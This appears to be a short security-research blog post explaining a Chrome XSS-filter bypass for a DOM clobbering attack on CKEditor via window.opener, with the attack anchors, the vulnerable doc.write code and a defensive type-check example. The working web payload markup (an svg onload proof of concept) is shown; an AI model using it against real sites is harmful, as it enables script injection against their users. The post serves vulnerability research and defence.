Chrome XSS filter bypass for a DOM clobbering attack

I found an interesting Chrome XSS filter bypass in @0x6D6172696F's @nullcon training for this DOM clobbering attack.


window.opener can be abused to launch XSS attacks when the opened page trusts properties it reads from it. There is an interesting XSS filter bypass which I found during Mario Heiderich’s training at NullCon, Goa 2015.

In the below DOM clobbering attack (CKEditor DOM XSS issue), a page hosting the following malicious link will trigger DOM XSS on the target application once clicked:

<a href="vuln.html#<svg onload=alert(1)>" id="_cke_htmlToLoad" target="_blank">XSS ME!</a>


The above attack vector will only work on IE and will be blocked by Chrome’s XSS filter, because the payload appears both in the request URL of vuln.html and in the markup the page writes. A way to bypass it is to craft the attacker page with the following code, which keeps the payload in the href of a second anchor on the attacker’s own page (the target is opened with a clean URL, so the filter finds nothing in the request to match against):

<a href="#<svg onload=alert(1)>" id="_cke_htmlToLoad"></a>
<a href="vuln.html" target="_blank" id="_c">XSS ME!</a>

Vulnerable code (CKEditor; window.opener._cke_htmlToLoad resolves to the clobbering <a> element, whose string form is its href):

<script>
var doc = document;
doc.open();
doc.write( window.opener._cke_htmlToLoad );   // << Vulnerable code: untrusted opener value written as HTML
doc.close();

delete window.opener._cke_htmlToLoad;
</script>
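The following is an added example, not CKEditor’s code or its actual fix. It models the coercion that makes the attack work (an anchor element’s string form is its href) and a defensive read that rejects anything that is not a real string; the opener objects, the fakeAnchor() helper and the attacker.example URL are constructed stand-ins so it runs outside a browser.

```javascript
// Constructed stand-in for a clobbering <a id="_cke_htmlToLoad"> element:
// HTMLAnchorElement.prototype.toString returns the element's href, which is
// what doc.write() ends up receiving when the element is passed to it.
function fakeAnchor(href) {
  return {
    nodeType: 1,
    tagName: 'A',
    href,
    toString() { return this.href; },
  };
}

// Constructed stand-in for window.opener on the attacker page: the anchor's
// relative href "#<svg onload=alert(1)>" has resolved against the attacker
// page's own URL (attacker.example is a placeholder).
const clobberedOpener = {
  _cke_htmlToLoad: fakeAnchor('https://attacker.example/#<svg onload=alert(1)>'),
};

// A legitimate opener that set the property to a string, as CKEditor expects.
const legitOpener = { _cke_htmlToLoad: '<p>Preview</p>' };

// What the vulnerable doc.write() call sees: implicit string coercion of the
// clobbering element yields its href, markup included.
function coercedPayload(opener) {
  return String(opener._cke_htmlToLoad);
}

// Defensive read: only accept a real string. A clobbered DOM element, null,
// undefined or any other type is rejected, so the coercion above never happens.
function readHtmlToLoad(opener) {
  const value = opener && opener._cke_htmlToLoad;
  if (typeof value !== 'string') return null;
  return value;
}
```

The string returned by readHtmlToLoad() is still attacker-controlled if the opener is untrusted; the check only closes the clobbering path, not the decision to write opener-supplied HTML.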

Diff of the CKEditor XSS fix: https://git.uwaterloo.ca/libraries/ckeditor/commit/5f13374b015240ba7cda1c0348c5468a17fb701a.diff

Tweet: https://twitter.com/VaibhavGupta_1/status/568732278932639744
Found on: 05 Feb 2015 
